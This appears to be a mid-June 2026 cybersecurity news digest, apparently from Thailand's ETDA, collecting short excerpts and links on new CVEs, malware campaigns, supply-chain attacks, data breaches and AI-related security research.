New Tooling
- Open-Source CI/CD Abuse Detector Guards Against Stolen Credential Attacks
"CI/CD Abuse Detector is an open-source project that uses a large language model to flag suspicious changes to continuous integration and continuous deployment pipelines, workflows, and automation configurations. The repository contains drop-in templates for GitHub Actions, GitLab CI, and Azure DevOps. The project targets a common attack chain in software supply chain compromises. Stolen developer credentials are used to push modifications to workflow files, which then harvest secrets stored in the CI environment. The detector aims to catch these modifications during code review, before the altered workflow executes."
https://www.helpnetsecurity.com/2026/06/15/ci-cd-abuse-detector-open-source/
Vulnerabilities
- CVE-2026-48558: SimpleHelp Authentication Bypass Indicators Of Compromise
"At Horizon3.ai, we have been experimenting with generative AI heavily across all areas of work. One area I commonly work in is vulnerability research. Early in 2026, and inspired by DARPA’s AIxCC, I ventured into creating an autonomous vulnerability research pipeline that would re-implement my research methodologies and hopefully find real, exploitable vulnerabilities. This internal initiative is codenamed “Sua Sponte” – latin for “Of its own accord”."
https://horizon3.ai/attack-research/disclosures/cve-2026-48558-simplehelp-authentication-bypass-iocs/
https://www.bleepingcomputer.com/news/security/simplehelp-bug-lets-hackers-create-rogue-remote-support-accounts/ - CISA Adds Two Known Exploited Vulnerabilities To Catalog
"CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2026-20262 Cisco Catalyst SD-WAN Manager Directory or Path Traversal Vulnerability
CVE-2026-54420 LiteSpeed cPanel Plugin UNIX Symbolic Link (Symlink) Following Vulnerability"
https://www.cisa.gov/news-events/alerts/2026/06/15/cisa-adds-two-known-exploited-vulnerabilities-catalog - Cisco Fixes SD-WAN vManage Flaw Exploited In Zero-Day Attacks
"Cisco has released security updates to address a vulnerability in the Catalyst SD-WAN Manager, tracked as CVE-2026-20262, that was exploited in attacks to escalate to root privileges. Formerly known as SD-WAN vManage, this network management software allows admins to manage up to 6,000 SD-WAN devices from a single dashboard. The now-patched zero-day security flaw affects all deployment types, regardless of device configuration, including on-prem deployments, Cisco SD-WAN Cloud-Pro, Cisco SD-WAN Cloud (Cisco Managed), and Cisco SD-WAN for Government (FedRAMP)."
https://www.bleepingcomputer.com/news/security/cisco-fixes-sd-wan-vmanage-flaw-exploited-in-zero-day-attacks/
https://www.theregister.com/patches/2026/06/15/cisco-sd-wan-make-me-root-bug-under-attack/5255916 - SearchLeak: How We Turned M365 Copilot Into a One-Click Data Exfiltration Weapon
"Varonis Threat Labs has uncovered a new three-stage vulnerability chain that turns Microsoft 365 Copilot Enterprise Search into a silent data exfiltration weapon. Dubbed SearchLeak, the chain combines a relatively new class of AI-specific vulnerability known as Parameter-to-Prompt Injection (P2P) with two classic web security bugs: an HTML injection race condition and a server-side request forgery (SSRF)."
https://www.varonis.com/blog/searchleak
https://thehackernews.com/2026/06/one-click-microsoft-365-copilot-flaw.html
https://www.bleepingcomputer.com/news/security/new-attack-turned-microsoft-365-copilot-into-1-click-data-theft-tool/
https://www.darkreading.com/application-security/copilot-searchleak-attack-1-click-data-theft - LiteLLM Vulnerability Chain Lets Low-Privilege Users Take Over AI Gateway Servers
"A default low-privilege account on a LiteLLM proxy can climb to full admin and run code on the server by chaining three vulnerabilities, researchers at Obsidian Security disclosed LiteLLM is a widely deployed open-source AI gateway that brokers calls to more than 100 model providers behind one OpenAI-compatible interface. A server takeover exposes every provider key it holds, the secrets that decrypt its stored credentials, and every prompt and response passing through it."
https://thehackernews.com/2026/06/litellm-vulnerability-chain-lets-low.html
Malware
- Android.MagicAd Trojan Displays Ads Despite All Restrictions
"Doctor Web’s experts have discovered Android.MagicAd, a trojan that bypasses Android OS restrictions in various ways to display background ads. One of these methods is universal, while the others are designed for devices from specific manufacturers. These include exploiting third-party software and using the system media player."
https://news.drweb.com/show/?i=15262&lng=en
https://hackread.com/android-apps-magicad-trojan-official-stores/ - PhishLumos: Exposing Phishing Campaigns That Evade Detection By Hiding Content
"Phishing remains one of the most stubbornly persistent threats in cybersecurity: humans are tired, distracted, trusting, and susceptible to urgency and authority in ways that no amount of awareness training can completely overcome. The security community has largely accepted this reality and shifted focus toward automated detection systems that can intercept and block phishing threats before users see them."
https://www.helpnetsecurity.com/2026/06/15/phishlumos-phishing-campaign-detection/
https://ieeexplore.ieee.org/document/11534625/authors - A Hardware Neural Network Backdoor That Hides In Plain Sight
"Deep learning systems on phones, cars, and other edge devices increasingly run on custom silicon. Specialized chips such as FPGAs and ASICs give these systems the speed and low power consumption that edge applications need. Many of these chips come from third-party design houses and foundries, which adds steps to the supply chain where an outside party can alter a device. Researchers at the University of Tennessee and the University of Florida built an attack that takes advantage of this arrangement. The attack, called HAMLOCK, short for Hardware-Model Logically Combined Attack, divides a backdoor into two parts and places them on opposite sides of the hardware and software boundary."
https://www.helpnetsecurity.com/2026/06/15/hardware-neural-network-backdoor-research/ - 152 Chrome Live Wallpaper Extensions Hid Ad Tracking And Faked Google Search Traffic
"Socket's Threat Research Team identified a family of 152 Chrome Web Store new-tab "live wallpaper" extensions, built from one shared codebase but distributed across 38 separate Chrome Web Store publisher accounts and three brand backends, carrying a combined total of approximately 105,000 reported installs. Every listing declares on the Chrome Web Store that it will not collect or use user data, while the linked privacy policy admits the opposite: that the extensions log IP addresses, ISP, click counts, and referrers and share that data with Google AdSense, DoubleClick, and third-party ad partners."
https://socket.dev/blog/152-chrome-live-wallpaper-extensions-hid-ad-tracking
https://thehackernews.com/2026/06/152-chrome-wallpaper-extensions-with.html - OptinMonster Supply Chain Attack Hits 1.2 Million Sites
"Sansec discovered an active supply-chain attack hitting over 1.2 million sites that use the popular OptinMonster, TrustPulse and PushEngage Wordpress plugins, all operated by Wordpress giant Awesome Motive. Attackers added malicious JavaScript to the legitimate files served by Awesome Motive, which are embedded in their customer's sites. The malware waits for a logged-in administrator, creates a backdoor admin account, and installs a self-hiding backdoor plugin. It then sends the new credentials to tidio.cc, a lookalike of the real tidio.com. The campaign is ongoing as of 13 June 2026."
https://sansec.io/research/optinmonster-supply-chain-attack
https://thehackernews.com/2026/06/popular-wordpress-plugin-scripts.html
https://www.bleepingcomputer.com/news/security/optinmonster-wordpress-plugin-hacked-in-cdn-supply-chain-attack/
https://securityaffairs.com/193616/malware/supply-chain-attack-hits-popular-wordpress-plugins-through-awesome-motive-cdn.html
https://www.infosecurity-magazine.com/news/wordpress-plugin-supply-chain/ - UNC1151/Ghostwriter Phishing Campaign Targeting Gmail Accounts
"The UNC1151/Ghostwriter group remains one of the most active APT groups monitored by the CERT Polska team. For many years, it has consistently conducted phishing campaigns aimed at gaining access to the email accounts of Polish citizens. Once compromised, attackers search for valuable information on these accounts, such as contact lists (used to identify further targets), sensitive documents, or linked accounts (e.g., social media). These linked accounts can then be taken over."
https://cert.pl/en/posts/2026/06/UNC1151-gmail-campaign/
https://therecord.media/ghostwriter-targets-personal-gmail-accounts-in-poland - The Gentlemen Ransomware: 483 Victims And a Leaked Playbook
"The Gentlemen, a ransomware-as-a-service crew active since around September 2025, has now listed 483 victims on its dark-web leak site, including 380 in 2026 alone, according to Ransomtracker data Ransomnews pulled on 13 June 2026. A May 2026 leak of the gang’s internal chat logs exposed a nine-person core, AI-assisted tooling, and an intrusion model built on stolen infostealer credentials. The group is active and still listing victims weekly."
https://ransomnews.com/the-gentlemen-ransomware-2026/
https://securityaffairs.com/193622/uncategorized/infostealers-ai-and-a-90-affiliate-cut-fuel-the-gentlemen-groups-rise.html - FBI: Fraudsters Use Couriers To Steal Money In Crypto Scams
"The U.S. Federal Bureau of Investigation (FBI) warned that criminals are using couriers to collect money from victims of cryptocurrency investment scams, also known as pig butchering or romance baiting. Such scams usually start with the fraudsters reaching out to their targets via social media, dating sites, and messaging apps, building trust, and then luring victims into fake investment schemes. However, instead of investing their funds, the scammers will steal the money by moving it into accounts under their control."
https://www.bleepingcomputer.com/news/security/fbi-fraudsters-use-couriers-to-steal-money-in-crypto-scams/
https://www.ic3.gov/PSA/2026/PSA260615 - Public And Private Medical Community Targeted By China-Nexus Threat Actor Pursuing Artificial Intelligence, Cyber, Medical, And National Defense Research
"Google Threat Intelligence Group (GTIG) has identified a sophisticated campaign attributed to UNC6508, a People's Republic of China (PRC)-nexus threat actor, targeting institutions in the North American academic, medical, and military research community. While remaining undetected for over a year, the threat actor compromised externally facing web applications, deployed bespoke malware, pivoted to sensitive internal systems, and abused enterprise administrative tools for covert data exfiltration. The threat actor had broad collection aspirations, including sensitive defense intelligence related to national security, Indo-Pacific command operations, artificial intelligence, uncrewed vehicle systems, cyber offensive programs, and medical research."
https://cloud.google.com/blog/topics/threat-intelligence/prc-targets-us-medical-research
https://www.bleepingcomputer.com/news/security/chinese-hackers-breach-redcap-servers-steal-medical-research/
https://thehackernews.com/2026/06/chinese-hackers-abused-google-workspace.html
https://www.darkreading.com/threat-intelligence/china-nexus-actor-us-researchers-undetected
https://cyberscoop.com/google-unc6508-china-espionage-threat/
https://www.securityweek.com/chinese-hackers-target-medical-military-and-ai-research-in-north-america/
https://www.theregister.com/research/2026/06/15/google-says-prc-linked-spies-hid-in-medical-research-networks-for-more-than-a-year/5254547
https://www.helpnetsecurity.com/2026/06/15/chinese-hackers-redcap-medical-research-institutions-breach/ - The Anubis Ransomware Attack On The Adriatic Port Authority
"A severe ransomware attack orchestrated by the Anubis ransomware group targeted the Adriatic Port Authority, crippling its operations and disrupting maritime logistics across the region. This cyberattack has raised significant concerns about the vulnerabilities in critical infrastructure. Considering ongoing global supply chain disruptions and the emergence of new threats in the maritime security domain, Resecurity forecasts an increase in malicious activity by nation-states, cyber-mercenaries, advanced cybercriminal and espionage groups. Ransomware attacks have repeatedly targeted port authorities and maritime operations across countries, causing widespread disruption and massive financial losses. Below are confirmed cybersecurity incidents:"
https://www.resecurity.com/blog/article/the-anubis-ransomware-attack-on-the-adriatic-port-authority
https://www.infosecurity-magazine.com/news/anubis-ransomware-adriatic-port/ - Inside a Malicious Infrastructure Delivering EtherRAT, Phishing Pages, And Malicious Software
"During our recent threat hunting activities, we found EtherRAT malware being distributed by a website with a strange homepage. This homepage allowed us to discover a vast malicious infrastructure distributing malware, malicious documents, remote desktop software, and phishing pages. EtherRAT is a RAT developed in Node.js which allows an attacker to gain complete control over the machine and execute arbitrary code returned by the Command and Control (C2) server. The malware uses the Etherium blockchain to obtain the C2 server, hence the “Ether” part of the name. EtherRAT is typically distributed via MSI, PowerShell, or JavaScript scripts."
https://www.malwarebytes.com/blog/threat-intel/2026/06/inside-a-malicious-infrastructure-delivering-etherrat-phishing-pages-and-malicious-software
Breaches/Hacks/Leaks
- ShinyHunters Claims Council Of Europe Hack
"The notorious extortion group ShinyHunters claims to have hacked the Council of Europe and to have stolen nearly 300 gigabytes of data. Europe’s leading human rights organization and an official United Nations observer, the Council of Europe was founded in 1949 and includes 46 member states, including 27 European Union countries. On Sunday, ShinyHunters added the Council of Europe to its Tor-based leak site, threatening to release more than 297 GB of data allegedly stolen from the organization’s network."
https://www.securityweek.com/shinyhunters-claims-council-of-europe-hack/
https://www.bleepingcomputer.com/news/security/council-of-europe-investigates-shinyhunters-data-breach-claims/
https://www.theregister.com/cyber-crime/2026/06/15/council-of-europe-hacked-in-shinyhunters-peoplesoft-heist/5255757 - Infinite Campus Data Breach Affects 137,000 School Staff Accounts
"The ShinyHunters extortion gang stole personal information from more than 137,000 school staff accounts in a Salesforce data theft attack that targeted the widely used Infinite Campus K-12 student information system in March. Infinite Campus is an education technology (EdTech) company that provides a student information system (SIS) to over 3,200 school districts across the United States, managing data for 11 million students in 46 states."
https://www.bleepingcomputer.com/news/security/infinite-campus-data-breach-affects-137-000-school-staff-accounts/ - Cyberattack On Russian Tech Firm Astral Disrupts Business, Government Services For Week
"The Russian software company Kaluga Astral said on Monday that it had been hit by a cyberattack earlier this month that disrupted several of its services for about a week, affecting customers that rely on its software for tax reporting, electronic document management and other business operations. “We are bringing each service back online only after completing a full security review — we are not willing to compromise security for the sake of speed. That is why the recovery process is taking longer than we would like,” the company said."
https://therecord.media/cyberattack-on-russian-tech-firm-astral-disrupts-business-government-services
General News
- Onspring CISO On Where Automated GRC Systems Fall Short
"In this interview with Help Net Security, Nichole Windholz, CISO at Onspring, talks about the limits of automated GRC systems and continuous control monitoring. She explains why color-coded dashboards can hide nuance, how teams can check the data feeding their tools, and which risks resist measurement, such as insider behavior and vendor concentration."
https://www.helpnetsecurity.com/2026/06/15/nichole-windholz-onspring-automated-grc-systems/ - Senior Engineers Are Spending Their Week Cleaning Up AI-Generated Code
"At most U.S. technology companies, machines now write the bulk of the code that ships each week. The engineer’s job has shifted toward reviewing what the AI produces, and that review gives the code high marks. Leaders rate AI-generated code as higher quality than the code their own people write, praising its clean structure, consistent style, and low count of obvious bugs at submission time. The same code behaves worse once it runs. Production incidents have climbed over the past year. Senior engineers spend more of their time fixing what the AI generated. A large majority of organizations hit at least one production failure tied to AI code in the past six months, and a sizable share of that code goes back for repair soon after it ships."
https://www.helpnetsecurity.com/2026/06/15/ai-generated-code-review-issues/ - When AI Leaves The Lab: Testing Frontier Models In Government Cyber Defence
"The Government Cyber Action Plan aims to boost cyber resilience across the UK public sector by using emerging technologies to manage risk. The Government Cyber Coordination Centre (GC3) - a partnership between the NCSC and the Department for Science, Innovation and Technology - is leading this work, exploring how frontier AI can be applied safely to cyber defence across government."
https://www.gov.uk/government/case-studies/when-ai-leaves-the-lab-testing-frontier-models-in-government-cyber-defence
https://www.infosecurity-magazine.com/news/uk-government-400-vulnerabilities/ - Energy, Healthcare, And Finance: Why Midwest Industries Are Facing Surging Cyber Attacks
"Across the United States, the average organization faced slightly fewer cyber attacks per week in May 2026 than it did a year earlier, according to Check Point Research — the national figure was essentially flat year over year. In the Central US, however, the trend ran the other way. Organizations there faced more attacks than a year ago, and more than the national average — as they did in every month of 2026."
https://blog.checkpoint.com/usa/energy-healthcare-and-finance-why-midwest-industries-are-facing-surging-cyber-attacks/ - Travel Phishing And Cyber Attacks Are Surging In 2026, Growing 122% Over The Last 3 Years. Here’s What Cyber Criminals Are Actually Doing
"Every summer, hundreds of millions of people book flights, reserve hotels, and plan vacations online. And every summer, cyber criminals show up to take advantage of exactly that. Check Point Research tracked the threat landscape heading into the 2026 summer travel season, and what they found should give travelers pause before they click “confirm booking.”"
https://blog.checkpoint.com/research/travel-phishing-and-cyber-attacks-are-surging-in-2026-growing-122-over-the-last-3-years-heres-what-cyber-criminals-are-actually-doing/ - The Beginning Of The End Of Social Engineering
"Over the past month, the world's largest technology companies have quietly converged on the same idea. In May, Google positioned Gemini as an increasingly integrated part of Android. This week, Apple expanded Apple Intelligence across the iPhone, iPad, and Mac. While much of the attention has focused on productivity and convenience, a more significant shift may be underway. For the first time, operating systems are beginning to move beyond simply executing commands and displaying information. They are becoming active participants in interpreting what users see, hear, receive, and trust."
https://www.darkreading.com/cyberattacks-data-breaches/beginning-end-social-engineering - AI Vulnerability Discovery Is Pushing 2026 CVEs Toward 66,000
"Vulnerability disclosures are piling up faster in 2026 than anyone expected at the start of the year. The running count for the first few months sits well above the original projection, and the Forum of Incident Response and Security Teams (FIRST) now expects the year to land near 66,000 CVEs. The cause sits mostly with one development: AI tools have started hunting for software flaws on their own, and they are good at it. “The teams that will weather the vulnerability storm of 2026 are the ones with trusted networks already in place, who are sharing intelligence and are coordinating response before any crises hit,” said Chris Gibson, CEO of FIRST."
https://www.helpnetsecurity.com/2026/06/15/first-2026-cve-forecast/
อ้างอิง
Electronic Transactions Development Agency (ETDA) 
